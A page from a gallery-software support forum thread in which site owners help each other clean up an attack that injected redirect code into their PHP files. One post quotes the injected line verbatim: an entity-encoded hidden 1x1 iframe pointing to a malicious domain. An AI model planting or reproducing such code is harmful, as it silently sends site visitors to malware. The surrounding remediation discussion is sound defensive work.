Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: 1 ... 6 7 8 9 [10] 11 12 13 14 15   Go Down

Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 334125 times)

0 Members and 1 Guest are viewing this topic.

tfischer

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 75
    • Fischersplace Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #180 on: April 14, 2008, 09:30:50 pm »

Basically I want to do whatever I can to hide my galleries for the next few days/ weeks even if they need to go offline.

There has been no indications or rumors that there is additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release.  Upgrade, sanitize, and cross your fingers...

-Tim
Logged

Hein Traag

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: nl
  • Offline Offline
  • Gender: Male
  • Posts: 2166
  • A, B, Cpg
    • Personal website - Spintires.nl
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #181 on: April 14, 2008, 09:46:47 pm »

No need to go paranoid people ;)

As Tim says. Update to 1.4.18 and you should be fine.

Kudos to Nibbler
Logged

ChaosCrusader

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 20
    • Finalf Frontier - The Ultimate Free Space Wallpapers
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #182 on: April 14, 2008, 10:39:25 pm »

Can someone provide some clear instructions on how to sanitize your site?

From what I can gather this exploit went after the config and template files for Coppermine and Simplemachine forums.  I've checked my site and removed the upload and update files, removed the files uploaded by the exploit and removed and replaced the template and config files with backups.  Is there anything else I need to do?

capecodgal

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 123
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #183 on: April 15, 2008, 12:45:53 am »

Quote
There has been no indications or rumors that there is additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release.  Upgrade, sanitize, and cross your fingers...

-Tim


No need to go paranoid people ;)

As Tim says. Update to 1.4.18 and you should be fine.

Kudos to Nibbler

Thanks guys for the advice... LOL I agree I went into a panic this morning when I saw it hit all of my sites; but believe I understand where they (moddys) are coming from in wanting to get it right to fix it; I work w/ a software company and I know we can't get our developers to fix anything if we can't tell them where its broken- no need to look through 10,000+ lines of code it would take them ages; so yes I totally understand and appreciate what the developers of cpg are trying to do here and only get valid info...... problem is those of us that are not coders don't know the difference and I knwo they can't teach us what is and what isn't LOL - but I am thinking the update.php may be part of it after re-reading the multiple pages in this thread if that how the attack originally gets the table names....

I can't get into my ftp or run the new upgrade until I am at home later tonight but here is what I am finding (sorry no logs or anything on this to support it just what I have seen and I apologize if its useless info but if it helps anyone I consider it worth posting so advance apologies to the moddys if this is indeed useless info)

Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)

Code: [Select]
<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'?>

So those of you that don't know what to do:

 #1 ask your host to restore your entire website it is the safest and best way to be sure all malicious code is gone OR if you do not have backups then unfortunately you are like me and will have to salvage what you can start looking at the php files in cpg and if its the same type of attack look for a line of code like what I posted above; mine were located at the very end of the php file after all coppermine code- just be sure not to delete anythign else you don't know what it is

#2 upgrade your galleries to the latest release (.18 is it I think)

#3 Be sure you do not give more access to your files than you need to; I have a bad habit of chmodding to 777 when I upload file batches and I forget to set it back when I am done to 644 or 755
*** I say this because chances are thats how this loser was able to get in my sites was because of my own stupidity with the permissions- interestingly enough ALL of our sites on Windows servers have not been effected by this hacker as chmod is a unix command and permissions are set manually in the OS with Windows instead of through FTP like on a unix/ apache server - for once in my life I am seeing Windows be the safer option which I find unbelievable but it explains alot (IMHO) as I know how hosting via Windows works and all permissions are preset and not changeable via the ftp

Logged

foulu

  • Contributor
  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Gender: Male
  • Posts: 236
  • uhm
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #184 on: April 15, 2008, 07:27:27 am »

Hi,

I make a php file that can sanitize the addition data from php & html file that infected with iframe things. I create it to use on one of my working site but I think release it will help more people. The script is simple, just check current folder and all sub folder for .php & .html, loop to find infect string in those files and then remove it. Anyway, use it with own will, I will not take any responsibility if you damage your site when using it.

I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

update: change some function to make the cure script run successful in more case.
update: add new url for download http://kak.amfcvn.net/files/cure.txt
« Last Edit: April 24, 2008, 09:43:06 am by foulu »
Logged

François Keller

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #185 on: April 15, 2008, 07:51:52 am »

Thanks for sharing your script.
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

ChaosCrusader

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 20
    • Finalf Frontier - The Ultimate Free Space Wallpapers
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #186 on: April 15, 2008, 10:48:57 am »

Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)


That's strange.  I only found it added to the template and config files.  Once I removed it from there it doesn't show up on any of my pages (as far as I can tell, by viewing the source).  Could it be that the exploit was used in different ways?

I'll go through my cpg files to double check.

NoviceScotty

  • Coppermine newbie
  • Offline Offline
  • Posts: 7
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #187 on: April 15, 2008, 10:50:36 am »

Hi guys -

being mildly annoyed by the fact that my web site was taken down and it would seem at least one computer rendered unusable by the stuff that was downloaded from the redirection (I'll post again if I ever get it repaired - it keeps running iexplore.exe svchost.exe and crashing)
I reported the cdpuvbhfzz to my local authorities (I'm in Switzerland).
Maybe you could all do the same in your countries. It probably doesn't do much good, might it might make you feel a little better.
The replies weren't very helpful, but rather than shouting at each other, better to light a candle than complain about the darkness, as I'm sure someone must have said.

>Many thanks for your query with the Reporting and Analysis Centre for Information Assurance (MELANI) of the Swiss Federal Police.
They went on to say it was my own fault for not keeping my web site updated, but at least they looked at it.

>We are happy to let you know that Cybercrime Coordination Unit Switzerland (CYCO) has received your message
> thank you for your cooperation. CYCO will verify your announcement, undertake the necessary steps and, where appropriate, contact you again.

Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #188 on: April 15, 2008, 11:14:40 am »

That's strange.  I only found it added to the template and config files.  Once I removed it from there it doesn't show up on any of my pages (as far as I can tell, by viewing the source).  Could it be that the exploit was used in different ways?

I'll go through my cpg files to double check.

The malicious code can only be added to files that have permissions set to be writable. The people with the biggest problems are those who had their entire site writable, so many more files were infected.
Logged

ChaosCrusader

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 20
    • Finalf Frontier - The Ultimate Free Space Wallpapers
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #189 on: April 15, 2008, 11:26:31 am »

The malicious code can only be added to files that have permissions set to be writable. The people with the biggest problems are those who had their entire site writable, so many more files were infected.

Ah, that explains it.  Would it be a good idea to change the permissions for the theme folder to exlude write permission?  Would it cause any problems with Coppermine?

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #190 on: April 15, 2008, 01:34:58 pm »

The only things that need to be writable are those mentioned in the docs - albums directory + subdirectories and the include dir (during installation only). Everything else should be read only.
Logged

dgeo

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #191 on: April 15, 2008, 02:09:46 pm »

A little shell (/bin/sh) script to clean up that... Not better than capecodgal's one but very simple to use if you have shell access or /bin/sh cgi capabilities.

Use it on your web's root.
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #192 on: April 15, 2008, 04:58:28 pm »

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #193 on: April 15, 2008, 06:03:39 pm »

Awesome :)
Logged

François Keller

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #194 on: April 15, 2008, 06:05:06 pm »

Woaw Joachim great work, Thank's for this awesome job. (i'll see to translate this for the french board)
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

capecodgal

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 123
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #195 on: April 15, 2008, 06:28:04 pm »

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim


THANK YOU very much for all of your hard work - it is much appreciated Gau Gau  ;D
Logged

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #196 on: April 15, 2008, 06:54:10 pm »

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site.
Great stuff.
Logged

AnnieBarlow

  • Coppermine newbie
  • Offline Offline
  • Posts: 10
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #197 on: April 15, 2008, 07:34:26 pm »

Is update.php admin only?

I'm 99% sure that I've upgrade one gallery to 1.4.16 without logging in
Logged

steveeh131047

  • Supporter
  • Coppermine frequent poster
  • ****
  • Offline Offline
  • Posts: 217
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #198 on: April 15, 2008, 07:38:01 pm »

Joachim: Thanks so much for this - you're a hero  :)

Nibbler: And thanks to you for the work on v1.4.18
Logged

Pascal YAP

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 13833
  • Hello World :-)
    • CPG 1.5.x ExperiMental website
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #199 on: April 15, 2008, 10:08:27 pm »

WoWWoar !
Joachim Terrible ;D
Like Thu's cats, you have seven lives, 7 heads, 7 keyboards  ;D

@François
About our Fr Board, you'll start and i'll finish ?  ;)

PYAP
Logged
Pages: 1 ... 6 7 8 9 [10] 11 12 13 14 15   Go Up
 

Page created in 0.038 seconds with 20 queries.